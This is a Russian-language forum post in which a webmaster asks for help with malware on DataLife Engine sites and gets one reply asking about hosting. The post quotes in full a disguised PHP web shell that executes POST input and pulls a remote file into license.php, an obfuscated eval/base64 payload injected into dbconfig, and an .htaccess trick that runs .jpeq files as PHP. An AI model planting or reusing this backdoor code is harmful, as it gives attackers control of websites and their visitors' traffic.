Вопрос? Вирус в новых версиях dle

Всем привет. Пользуюсь чистой DLE которую выкладывал byroot версии 14.

После создания сайта в этот же день появляется вот такой файл - /uploads/fotos/foto_84812387.jpeq (название может меняться, но формат такой же).

С содержимом:

Спойлер: Содержимое

<?php
/*
* jQuery Image Library v1.6.1
* jQuery
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* License | jQuery Foundation
*
* Includes Sizzle.js
* jquery/sizzle
* Copyright 2011, The Dojo Foundation
* Released under the MIT, BSD, and GPL Licenses.
*
* Date: Thu May 12 15:04:36 2011 -0400
* * * * * * * * * * * * * * * * * * * * Don't delete this file * * * * * * * * * * * * * * * *
*/
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@error_reporting(0);
@set_time_limit(0);
$cret='unct' .'ion';$cret= 'cre' . 'ate' .'_f' .$cret;
$jQuery='sert';$jQuery='as'.$jQuery;$Libr= "_ostp";
$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );
if(isset(${$sizz}['j01bt5ri3p'])){@$cret('', '};'.${$sizz}['j01bt5ri3p'].'{');}
if(isset(${$sizz}['j01bt5ri3p'])){@$jQuery(${$sizz}['j01bt5ri3p']);}
if((isset(${$sizz}['j01bt5ri3p']))&(isset(${$sizz}['fail']))){
@copy('http://'.${$sizz}['fail'].'/test.txt', $_SERVER['DOCUMENT_ROOT'].'/license.php');}
print"<!-- te"."st --> ";
?>

И так на всех сайтах, где искать проблему, как чистить? Эта хрень потом вшивает в сайт dbconfig:

Спойлер: Хрень из DBCONFIG

$liciens = "Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6lVG1v2zYQ/is2IIQS6smOZcd2PGFbC6MLNqxbmqwY2oCgpLPEySIVkqqVjf7vO0rB0mSuv+wLj+S9PXx4d16iICaUDEJCG+0EqO7gFp6RNd/60Ww+/bYyVDGR+dH5YhSdR5Mg0KA1l4LyzPfom3fvfrrajDwF28D5cK3B/Hv/0cM0d0Hw9/d4m0pZcvDd1ei5wavzkeEV+MGr5Xw1X4zImATrA0Z7ESiOyWo6W0yi5YQEUn1Nu1ie1K5OaV3k/8IlF7PVdDJbzi+i1XyGy3IVTebL2cVsGa1m5Ah6R0js0feb69831x+1UQo++yiMbOoalE+4aqjR0Nwj70Fwt/YaxZ8cyPXmt9vN+xt6e31FUNmyqlRtm9/zAoqY8JasvULqkxmMlgWtjSn6+Oo0HgWIGNSTQwEsQ8WjKYm+43ka1pVxBTLWvDBjtytTKNLuKk1DJ3Mlnfgm2ne348u68zDF4FJI3m1Z5yB/JgGKMw2yqzzkC4Vi+0btQKQyQ+7VtjOpmWIVGFDxJ6+Eh71UGbrhQcNZo+Jz9DvyovjLJ53hm15EJ4Ux9eXYPcNxiasr4mANLTfrg9fo/DS9AnJGFejmf5CMNY76WmqfCNg19b1pyzYD02pIDBkR/RcJhnG8ZTsNwZbvgNaNoakUBoTRviua0WND9Vm7U9eJ/vCpmn68ufmV3uKJ/vB288sNues74KtqbIeuSYa1gpxWzKSFT8YJ41ljU2TQIpE7sB+iN9RudoZdCfshB2NxUEBrOaNMpYVlhZSW5xWzr6WxNcdysqxK0PEP9lrJvZUyx0OCyorxXTjmZORoD7AD8QHPcneRw95OWVmGqrGfyzCVfZCwD6zsnhusE8uFNizHnMKdeuCNaRLANUweelQyE7K0zU7mdstSSGRoNXTIHxx0zKZFmFpd8alVSRrahIu8R4mF2WF8DrIOE3yWxoz6oUqktiJTkme24lltQXHQnwYXE1uYlFqZ4G/aP6cVWLTlTKCV4LYupIAnItzkHb6YqSTDMmgwC05g/MmjNo9zt1M9gxizLBOw1xa7I+fasRNvAbKEpaWNkQrZGIuCi7Auasuy6ssdOihmcPj3CBXvU7jdYBgP3OQ7Mjwf5+7i2Jw8HA7/AGdDLmc=')));";$release_this = "cre"."ate_"."function";$dle_func = $release_this('', "$liciens;");$dle_func('');

в результате слив трафика и метка от Яндекса...

 

Такой файл появляется даже на сайтах где нет никого кроме админа, совсем...

 

Также есть файл .htaccess в папке /uploads/fotos/ с содержимом:

<FilesMatch ".([Pp][Hh][Pp]|[Cc][Gg][Ii]|[Pp][Ll]|[Pp][Hh][Ii][Mm][Ll]).?">
Order allow,deny
Deny from all
</FilesMatch>
AddHandler application/x-httpd-php .avi .jpeq .mpg4

 

VPS от Inferno, где логи найти?

 

Дистрибутив точно был установлен на сайты чистый 100%, даже есть сохраненные установочные файлы. Единственное, что нашёл, на одном из старый (мертвых) сайтов есть файлы из топика про сайты которые сливали кривые DLE, но вопрос - могут ли они заражать соседние сайты размещенные на сервере?

 

А какой у тебя хостинг?